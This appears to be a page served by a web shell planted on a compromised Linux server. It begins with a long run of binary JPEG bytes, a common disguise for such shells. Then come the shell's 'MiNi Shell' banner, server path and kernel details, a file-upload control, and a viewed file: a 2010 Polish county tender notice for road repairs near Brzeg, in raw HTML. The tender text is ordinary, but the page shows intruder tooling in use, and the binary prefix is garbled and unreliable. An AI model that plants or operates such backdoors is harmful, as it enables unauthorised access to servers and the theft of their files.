JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100302/46201-N-2010.html

<p class="kh_header"><b>Brzeg: REMONT DROGI POWIATOWEJ NR 1182 O ŁOSIÓW - KANTOROWICE</b><br>
<b>Numer ogłoszenia: 46201 - 2010; data zamieszczenia: 02.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DROGI POWIATOWEJ NR 1182 O ŁOSIÓW - KANTOROWICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie remontu  drogi powiatowej nr 1182 O ( od km 0+000 do km 6+410) będzie między innymi obejmować :
1) odnowę nawierzchni jezdni bitumicznej ( 4 cm + 4 cm + w-wa wyrównawcza),
2) remont chodnika w m. Nowa Wieś Mała   po stronie prawej o szerokości 1,50 mb łącznie
    ze zjazdami, po przeciwnej stronie drogi - wykonanie ścieków przykrawężnikowych,  
3)oczyszczenie rowów przydrożnych,  
4)ścinkę poboczy,
5)utwardzenie poboczy tłuczniem kamiennym,
6)montaż barier energochłonnych na przepustach i w  miejscach niebezpiecznych,
Pozostałe roboty ujęte w dokumentacji projektowej oraz szczegółowych Specyfikacjach Technicznych stanowiące załączniki do siwz. 
Wykonanie zgodnie z  dokumentacja projektową, specyfikacją  techniczną wykonania 
i odbioru robót , polskimi normami przenoszącymi normy europejskie lub innymi normami.
Zamawiający dopuszcza złożenie oferty równoważnej, tj. ujęcie w ofercie a następnie zastosowanie innych materiałów  niż podane w dokumentacji  projektowej, pod warunkiem zapewnienia parametrów nie gorszych niż  określone w tej dokumentacji. 
W ramach  zamówienia wykonawca zobowiązany jest również do:
1) zachowania przepisów BHP,
2) harmonogramu rzeczowo- terminowo-finansowego, uwzględniającego wykonanie całego
     przedmiotu umowy w terminie do 29 października 2010r. z podziałem na poszczególne 
       elementy(części)  do odbioru częściowego, łącznie z terminami wykonania tych części  
       oraz ich cenami wynikającymi  z załączonego do oferty kosztorysu . 
3)opracowania projektu zmiany organizacji ruchu drogowego na czas prowadzonych robót  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad  tym zarządzaniem (Dz. U. Nr 177, poz.1729 z póżn. zm.) zatwierdzony przez organ  zarządzający ruchem na drogach powiatowych  oraz jego utrzymania w trakcie prowadzonych robót w należytym stanie technicznym i estetycznym, 
Zaleca się , aby wykonawca dokonał wizji lokalnej terenu, którego dotyczy zamówienie oraz zdobył wszelkie informacje niezbędne do przygotowania oferty i podpisania umowy. 
Podwykonawstwo
Wykonawca może powierzyć podwykonawcom wykonanie części zamówienia , niemniej powierzenie danego zakresu zamówienia podwykonawcy wymaga, zgodnie z przepisem 
art. 647 1  KC  uprzedniej pisemnej zgody Zamawiającego .W takim przypadku Zamawiający wymaga wskazania w ofercie części zamówienia, która będzie powierzona podwykonawcy. 
Utylizacja odpadów
W trakcie wykonywania robót należy przestrzegać Ustawy o odpadach z dnia 27 kwietnia 2001r.  i Rozporządzenia i Ministra Środowiska w sprawie katalogu odpadów z dnia
12 czerwca 2001r.  
Okres gwarancji wynosi 36 miesięcy od daty odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.32.22-1, 45.23.10.00-5, 45.11.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy 
                        konsorcjum  łącznie) wykaże, że  posiada doświadczenie polegające 
                        na wykonaniu w okresie ostatnich  5 lat przed dniem wszczęcia   
                        postępowania (a jeżeli okres działalności jest krótszy - w tym okresie)
                         min. 1 robotę budowlaną w zakresie budowy, przebudowy ,remontu  
                         drogi w tym chodników o wartości brutto  nie mniejszej niż 
                         2 000 000,00 PLN (słownie: dwa  miliony złotych), na zasadzie spełnia
                         nie spełnia,
                     2) jeżeli wykonawca będzie wykazywał  poleganie na doświadczeniu 
                         innego podmiotu z art.26 ust.2b - to musi wykazać min. 1 robotę
                         budowlaną  jak  w § 5.2.1. pkt.1 siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy                                    
                       konsorcjum łącznie) wykaże, że dysponuje  niżej wymienionymi w pełni 
                       sprawnymi jednostkami sprzętu i środkami transportu zapewniającymi 
                       wykonanie zamówienia 
                       - rozkładarka mas bitumicznych                                                 - 1 szt,
                       - skrapiarkę                                                                                 -  1 szt, 
                       - frezarkę o szer.min.1,0 m                                                         -  1 szt,
                       - walec stalowy wibracyjny 10 Mg                                             -  2 szt,
                       - walec ogumiony                                                                        -  1 szt,
                       - zagęszczarka                                                                              -  1 szt,
                       - samochody samowyładowcze min.15 Mg z przykryciem
                          lub termosy                                                                               - 3 szt,
                       - piła do cięcia asfaltu                                                                  - 1 szt,

                       lub posiada pisemne zobowiązanie innego podmiotu do udostępnienia ww.
                       jednostek sprzętu na okres korzystania z nich przy wykonywaniu zamówienia 
                       na zasadzie spełnia nie spełnia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje
                      lub będzie dysponował min.1 osobą pełniąca funkcje kierownika robót
                      w specjalności drogowej z min. 5 letnim doświadczeniem  w zakresie robót 
                      bitumicznych i złoży stosowne oświadczenie , że osoba ta posiada wymagane 
                      uprawnienia o specjalności drogowej, 
                      lub posiada pisemne zobowiązanie innego podmiotu do udostępnienia ww.
                      osoby na okres korzystania z nich przy wykonywania zamówienia na zasadzie 
                      spełnia nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że znajduje 
                           się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
                           zamówienia przez przedłożenie informacji banku lub  spółdzielczej kasy
                           oszczędnościowo-kredytowej , w których Wykonawca posiada rachunek, 
                           potwierdzającej wysokość posiadanych środków finansowych lub zdolność
                           kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed
                           upływem terminu składania ofert  minimum posiadanych środków 
                           finansowych lub zdolność kredytową w wysokości  2 000 000,00 PLN,
                           (dwa miliony  złotych)na zasadzie spełnia nie spełnia,
                       2)jeżeli wykonawca polega na zdolności finansowej innego podmiotu
                            na zasadzie podanej w art.26 ust.2b ustawy Pzp należy przedłożyć 
                            informację, której mowa w § 5.2.4. pkt.1 siwz dotyczącej tego podmiotu,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) OFERTA - wg załączonego wzoru do wypełnienia - zał. nr 1,
         2) KOSZTORYS OFERTOWY  - wg załączonego wzoru do wypełnienia- zał. nr 2,
3) zaakceptowany WZÓR UMOWY - zał. nr 3,
         4)  druk  dotyczący podwykonawstwa ( załącznik nr 11) 
         5) pełnomocnictwo do podpisywania oferty reprezentacji o ile prawo do podpisywania, 
            reprezentacji nie wynika z innych dokumentów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Termin wykonania przedmiotu umowy ustala się: do 29.10.2010r.
2.Termin o którym mowa w ust.1 może ulec odpowiedniemu przedłużeniu o okres, w którym roboty
   nie będą mogły być wykonywane z powodu :
   - niekorzystnych warunków atmosferycznych  uniemożliwiającej prawidłowe wykonanie tych robót,
     gdy to wynika z technologii ich wykonania ,
-działania siły wyższej (np. klęski żywiołowej, strajki)mające bezpośredni wpływ na terminowość    
  wykonywania robót
- wystąpienia robót o których mowa § 4 ust.5,6 i 7 wzoru umowy.
3.Przedłużenie terminu wykonania umowy w przypadku wystąpienia okoliczności, o których mowa 
   w ust.2 nastąpi na podstawie pisemnego aneksu do umowy, sporządzonego na pisemny  
   umotywowany  wniosek Wykonawcy, po zaakceptowaniu go przez Inspektora Nadzoru z ramienia
   zamawiającego.
1. Za wykonanie za wykonanie  przedmiotu umowy określonego w § 1 strony ustalają wynagrodzenie      
    w kwocie :     
-	netto zł, słownie,  
    -     podatek VAT zł, słownie,
    -    brutto   zł , słownie   
         
2.Ostateczna  wysokość  wynagrodzenia   ustalona   zostanie   na   podstawie dokonanych  obmiarów 
   robót  sprawdzonych przez Inspektora  Nadzoru i zatwierdzonych przez  Zamawiającego przy 
   zastosowaniu cen jednostkowych zawartych w kosztorysie ofertowym Wykonawcy . 
3.W przypadku zmiany przez władzę ustawodawczą określonej w ust.1 procentowej stawki podatku 
   VAT , kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio   
   dostosowana.
4.Maksymalna kwota zobowiązania wynosi 110 % ceny brutto.
5.W przypadku, gdyby wynagrodzenie Wykonawcy obliczone zgodnie z ust.2 ,6 i 7 miało 
   przekroczyć  kwotę określoną w ust.4  Strony mogą dokonać zmiany tej kwoty w drodze aneksu do 
   umowy.
6.W przypadku stwierdzenia konieczności wykonania robót dodatkowych, wynagrodzenie za te roboty   
   będzie ustalone kosztorysem powykonawczym na podstawie faktycznie wykonanych robót   
   potwierdzonych przez inspektora nadzoru, uwzględniając składniki kalkulacyjne jak w kosztorysie   
   ofertowym Wykonawcy oraz protokółu konieczności potwierdzonego przez Inspektora Nadzoru,
   projektanta oraz głównego księgowego i zatwierdzonego przez Zamawiającego.
   Bez  zatwierdzenia przez Zamawiającego protokółu konieczności Wykonawca nie może rozpocząć
   robót  dodatkowych.
7.W przypadku wystąpienia składników kalkulacyjnych innych niż występują w kosztorysie 
   ofertowym, należy te składniki wycenić wg średnich cen z SEKONCENBUD-u za ostatni kwartał 
   poprzedzający sporządzenie kosztorysu powykonawczego, przy zachowaniu cen czynników 
   produkcji (R, M,.S, Ko, Z)  podanych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu ul.Wyszyńskiego 23,49-300 Brzeg pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2010 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu ul.Wyszyńskiego 23,49-300 Brzeg pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com